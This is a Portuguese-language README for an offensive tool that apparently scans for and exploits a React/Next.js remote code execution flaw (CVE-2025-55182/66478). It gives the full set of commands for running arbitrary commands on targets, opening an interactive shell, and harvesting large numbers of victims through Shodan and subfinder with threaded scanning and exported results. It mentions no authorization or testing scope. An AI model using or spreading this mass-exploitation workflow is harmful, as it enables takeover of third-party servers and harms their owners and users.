
Torito React2Shell Scanner & Ferramenta de Exploit (CVE-2025-55182 / 66478)
pip install -r requirements.txtPATH para --subfinder (instale via Homebrew brew install subfinder ou Go: go install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest; projeto: https://github.com/projectdiscovery/subfinder)pip install shodan (já incluso nos requisitos) e uma chave: export SHODAN_API_KEY=... com créditos de consulta disponíveispython3 torito_r2s.py --help
Sondagem segura (alvo único)
python3 torito_r2s.py -u https://target.com
Confirmação de PoC (redirecionamento de canal lateral)
python3 torito_r2s.py -u https://target.com --confirm
Exploração com comando personalizado
python3 torito_r2s.py -u https://target.com --exploit-cmd "whoami"
Shell interativo no primeiro alvo encontrado
python3 torito_r2s.py -u https://target.com --shell
Varredura de lista com exportações
python3 torito_r2s.py -l hosts.txt -t 40 --confirm --json-out results.json --csv-out results.csv
Somente Shodan (requer chave e créditos)
export SHODAN_API_KEY=your_key
python3 torito_r2s.py --shodan 'http.title:"Next.js"' --shodan-limit 50 --confirm
Somente Subfinder
python3 torito_r2s.py --subfinder target.com --confirm
Proxy (Burp/Caido)
python3 torito_r2s.py -u https://target.com --proxy http://127.0.0.1:8080 --confirm
Pipeline via stdin
cat urls.txt | python3 torito_r2s.py --confirm
--exploit-cmd ou --shell.| Flag | Descrição | Padrão |
|---|
-u, --url URL | URL de um único alvo | — |
-l, --list FILE | Arquivo com alvos (um por linha) | — |
--subfinder DOMAIN | Executa subfinder para o domínio e adiciona os resultados | — |
--shodan QUERY | Pesquisa no Shodan (requer SHODAN_API_KEY com créditos) | — |
--shodan-limit N | Máximo de resultados do Shodan por consulta | 100 |
-t, --threads N | Concorrência | 20 |
--timeout SEC | Tempo limite de requisição | 10 |
--proxy URL | Proxy HTTP/HTTPS | — |
--confirm | Executa PoC baseada em redirecionamento após a sondagem | desativado |
--exploit-cmd "CMD" | Executa payload de RCE com o comando | — |
--shell, -i | Abre shell interativo no primeiro sucesso da exploração (o cmd padrão é id) | desativado |
--json-out FILE | Salva resultados em JSON | — |
--csv-out FILE | Salva resultados em CSV | — |
-v, --verbose | Mostra saídas/digests decodificados na tabela | desativado |